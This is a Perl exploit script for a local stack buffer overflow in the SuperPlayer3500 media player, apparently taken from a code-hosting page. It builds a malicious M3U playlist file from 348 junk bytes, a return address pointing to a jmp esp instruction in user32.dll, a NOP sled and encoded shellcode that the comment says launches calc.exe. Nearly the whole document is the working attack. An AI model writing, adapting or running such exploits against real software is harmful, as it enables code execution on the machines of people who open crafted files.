38 lines
No EOL
1.4 KiB
Perl
Executable file
38 lines
No EOL
1.4 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
#SuperPlayer3500 Local stack based buffer overflow
|
|
#Author:jun
|
|
#Email:haojunhou@gmail.com
|
|
#Date:Tue Jul 22 2013
|
|
#Vendor Link:http://www.haojie.cn
|
|
#Software Link:http://www.haojie.cn/download/setup_3500.exe
|
|
#App Version:3500
|
|
#Tested on:windows xp sp3
|
|
|
|
$file = "superplay3500exp.M3U";
|
|
$junk = "A" x 348;
|
|
$eip = pack('V', 0x77d29353); #jmp esp on user32.dll
|
|
$nops = "\x90" x 20;
|
|
|
|
#exec calc.exe
|
|
$shellcode =
|
|
"\x33\xc9\xb8\xd1\xa3\x3d\x27\xda\xdf\xd9\x74\x24\xf4\xb1" .
|
|
"\x32\x5a\x83\xc2\x04\x31\x42\x0c\x03\x93\xaf\xdf\xd2\xef" .
|
|
"\x58\x96\x1d\x0f\x99\xc9\x94\xea\xa8\xdb\xc3\x7f\x98\xeb" .
|
|
"\x80\x2d\x11\x87\xc5\xc5\xa2\xe5\xc1\xea\x03\x43\x34\xc5" .
|
|
"\x94\x65\xf8\x89\x57\xe7\x84\xd3\x8b\xc7\xb5\x1c\xde\x06" .
|
|
"\xf1\x40\x11\x5a\xaa\x0f\x80\x4b\xdf\x4d\x19\x6d\x0f\xda" .
|
|
"\x21\x15\x2a\x1c\xd5\xaf\x35\x4c\x46\xbb\x7e\x74\xec\xe3" .
|
|
"\x5e\x85\x21\xf0\xa3\xcc\x4e\xc3\x50\xcf\x86\x1d\x98\xfe" .
|
|
"\xe6\xf2\xa7\xcf\xea\x0b\xef\xf7\x14\x7e\x1b\x04\xa8\x79" .
|
|
"\xd8\x77\x76\x0f\xfd\xdf\xfd\xb7\x25\xde\xd2\x2e\xad\xec" .
|
|
"\x9f\x25\xe9\xf0\x1e\xe9\x81\x0c\xaa\x0c\x46\x85\xe8\x2a" .
|
|
"\x42\xce\xab\x53\xd3\xaa\x1a\x6b\x03\x12\xc2\xc9\x4f\xb0" .
|
|
"\x17\x6b\x12\xde\xe6\xf9\x28\xa7\xe9\x01\x33\x87\x81\x30" .
|
|
"\xb8\x48\xd5\xcc\x6b\x2d\x27\x3c\xa6\xbb\xb0\xe7\x53\x86" .
|
|
"\xdc\x17\x8e\xc4\xd8\x9b\x3b\xb4\x1e\x83\x49\xb1\x5b\x03" .
|
|
"\xa1\xcb\xf4\xe6\xc5\x78\xf4\x22\xa6\x1f\x66\xae\x29"."\r\n";
|
|
|
|
open(FILE,">$file");
|
|
print FILE $junk.$eip.$nops.$shellcode;
|
|
close(FILE); |